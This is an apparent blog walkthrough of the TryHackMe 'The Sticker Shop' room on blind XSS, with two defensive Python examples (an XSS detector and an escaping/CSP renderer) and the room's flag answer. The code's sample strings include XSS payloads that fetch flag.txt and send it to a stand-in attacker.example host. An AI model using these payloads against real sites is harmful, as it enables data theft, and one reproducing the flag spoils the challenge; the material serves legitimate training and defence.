The post is a detailed walkthrough of a TryHackMe challenge called “The Sticker Shop,” which explores Cross-Site Scripting (XSS) vulnerabilities and how they can be leveraged to compromise a system.

Objective of the Challenge

  • Investigate an XSS vulnerability in a fictitious Sticker Shop web application.
  • Exploit this vulnerability to gain access to sensitive information, such as a flag file.

Step-by-Step Breakdown

Introduction

  • The challenge demonstrates how XSS vulnerabilities allow attackers to:
    1. Interact with the server.
    2. Access sensitive files.
  • The Sticker Shop’s website was built by inexperienced developers, making it vulnerable.

Exploration of the Website

  • Website Features:
    • Displays products (stickers), but they are non-interactive.
    • A feedback form accepts user inputs.
  • Initial Investigations:
    • Reviewed the page’s source code for hidden notes or developer comments but found nothing.
    • Tested the feedback form, as it accepts user input and interacts with the server backend.

Testing for XSS

  • Reflected XSS:
    • Attempted basic XSS payloads, such as an alert script, to observe if inputs were reflected in the server response.
    • These tests did not work, ruling out reflected XSS.
  • Blind XSS:
    • Crafted a payload using an <img> tag with a nonexistent source so that its error handler fires when the image fails to load.
    • That error handler issued a JavaScript fetch request to the attacker’s server, confirming that the submitted script was being executed on the back end even though nothing was reflected in the response.
    • Successfully confirmed the server’s vulnerability to blind XSS.
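The blind XSS probe above only works because the feedback text is stored and later rendered as live markup. The following is an added detection example, not code from the TryHackMe room or the original post: it parses each stored feedback submission and reports markup that would execute when rendered unescaped (risky tags, inline `on*` event handlers, `javascript:` URLs and script bodies that make network calls). The sample submissions and the `attacker.example` host are constructed placeholders.

```python
# Added example (not from the TryHackMe room or the original post): a small
# detector that inspects stored feedback submissions for markup that would
# execute when rendered unescaped in a staff-facing view, the blind XSS
# pattern the walkthrough describes (an <img> with a bad src and an error
# handler that calls fetch()). Sample submissions below are constructed.
from html.parser import HTMLParser

# Tags that can run script or load remote resources on their own.
RISKY_TAGS = {"script", "img", "svg", "iframe", "object", "embed", "link"}


class XssHintParser(HTMLParser):
    """Collect findings rather than raising, so one pass reports everything."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in RISKY_TAGS:
            self.findings.append(f"tag:{tag}")
        for name, value in attrs:
            # Any on* attribute is an inline event handler (onerror, onload, ...).
            if name.lower().startswith("on"):
                self.findings.append(f"handler:{name}")
            # javascript: URLs execute when followed.
            if value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"url:{name}")

    def handle_data(self, data):
        # Script bodies still reach handle_data; flag network calls in them.
        if "fetch(" in data or "XMLHttpRequest" in data:
            self.findings.append("network-call")


def scan_feedback(text):
    """Return the list of XSS indicators found in one feedback submission."""
    parser = XssHintParser()
    parser.feed(text)
    parser.close()
    return parser.findings


# Constructed sample submissions (not real data from the room);
# attacker.example is a placeholder host.
SAMPLES = [
    "Love the cat stickers, shipping was fast!",
    '<img src="x" onerror="fetch(\'http://attacker.example/ping\')">',
    '<a href="javascript:alert(1)">click</a>',
    "<script>fetch('/flag.txt').then(r=>r.text()).then(t=>fetch('http://attacker.example/?f='+t))</script>",
]


def triage(samples=SAMPLES):
    """Map each submission to its findings; an empty list means clean."""
    return {s: scan_feedback(s) for s in samples}


if __name__ == "__main__":
    for sample, findings in triage().items():
        print(("FLAG  " if findings else "clean ") + sample[:60], findings)
```

Run this over the feedback table (or the request log of the feedback endpoint) rather than in the browser: the whole point of blind XSS is that the attacker never sees the page where the payload fires, so the defender's visibility has to come from the stored data.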

Exploiting the Vulnerability

  • Step 1: Read the Flag File
    • Modified the payload to:
      1. Fetch the contents of the flag.txt file.
      2. Transfer the file contents to the attacker’s server using JavaScript.
  • Payload Details:
    • Constructed a custom JavaScript payload embedded in an <img> tag.
    • Used error handling to trigger a fetch request to the flag.txt file on the server.
    • Redirected the file contents to the attacker’s server.
  • Step 2: Enhance the Attack
    • Rewrote the attack using a full JavaScript wrapper for better flexibility and clarity.
    • Included error handling, variable definitions, and HTTP requests to fetch the flag and transmit it to the attacker’s server.
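The payload above lands because the staff-facing feedback view writes customer input straight into HTML. As an added example, not code from the TryHackMe room or the original post, the snippet below models that view with both renderings side by side: the unescaped one that lets the `<img>` handler run, and the fixed one that applies contextual output encoding and sends a Content-Security-Policy that refuses inline handlers and off-origin `fetch()` calls. The page template, headers and feedback strings are constructed, and `attacker.example` is a placeholder host.

```python
# Added example, not code from the TryHackMe room or the original post. It
# models the root cause of the blind XSS: a staff-facing page that renders
# customer feedback straight into HTML. render_feedback() shows both the
# unsafe rendering and the fix (contextual output encoding plus a
# Content-Security-Policy that refuses inline handlers and off-site fetches).
# The template, headers and feedback strings below are constructed samples.
import html

PAGE_TEMPLATE = """<!doctype html>
<html><body>
<h1>Customer feedback</h1>
<ul>
{items}
</ul>
</body></html>"""

# Headers the hardened view sends alongside the HTML. The CSP blocks inline
# event handlers (no 'unsafe-inline') and limits fetch()/XHR targets to the
# shop's own origin (connect-src), so a surviving payload cannot phone home.
SECURE_HEADERS = {
    "Content-Security-Policy": (
        "default-src 'self'; script-src 'self'; connect-src 'self'; "
        "img-src 'self'; object-src 'none'; base-uri 'none'"
    ),
    "X-Content-Type-Options": "nosniff",
}


def render_feedback(entries, escape=True):
    """Render feedback into the page; escape=False reproduces the vulnerable behaviour."""
    if escape:
        # html.escape(quote=True) converts < > & " ' so the browser parses text, not markup.
        items = "\n".join(f"<li>{html.escape(e, quote=True)}</li>" for e in entries)
    else:
        items = "\n".join(f"<li>{e}</li>" for e in entries)
    # str.format only expands the template's own {items}; braces in user input are left alone.
    return PAGE_TEMPLATE.format(items=items)


def markup_leaked(entries, escape):
    """True if any '<' from user input survived into the rendered HTML."""
    page = render_feedback(entries, escape=escape)
    baseline = render_feedback([], escape=True)
    # Each <li>..</li> pair adds exactly two '<' from the template; any more came from input.
    return page.count("<") > baseline.count("<") + 2 * len(entries)


# Constructed feedback entries; the second is the blind XSS probe shape from the walkthrough.
FEEDBACK = [
    "Great stickers, arrived quickly.",
    '<img src="x" onerror="fetch(\'http://attacker.example/ping\')">',
]

if __name__ == "__main__":
    print(render_feedback(FEEDBACK, escape=False))  # payload lands as live markup
    print(render_feedback(FEEDBACK, escape=True))   # payload shown as inert text
    for name, value in SECURE_HEADERS.items():
        print(f"{name}: {value}")
```

Encoding at output time is the primary fix; the CSP is defence in depth for the case where some other template forgets to escape, since `connect-src 'self'` stops the exfiltration step even if a handler fires.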

Key Learnings

  • XSS vulnerabilities can be exploited to retrieve sensitive information when combined with creative payloads.
  • Blind XSS attacks allow attackers to bypass restrictions where server responses are not directly visible.
  • Crafting advanced payloads, such as JavaScript wrappers, enables more complex exploitation.

Conclusion

  • Successfully retrieved the flag by leveraging blind XSS.
  • Demonstrated the process of identifying and exploiting web vulnerabilities step-by-step.
  • Emphasized the importance of secure web development practices to avoid such vulnerabilities.

TryHackMe The Sticker Shop | Room Answers

What is the content of flag.txt?
THM{83789a69074f636f64a38879cfcabe8b62305ee6}

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.
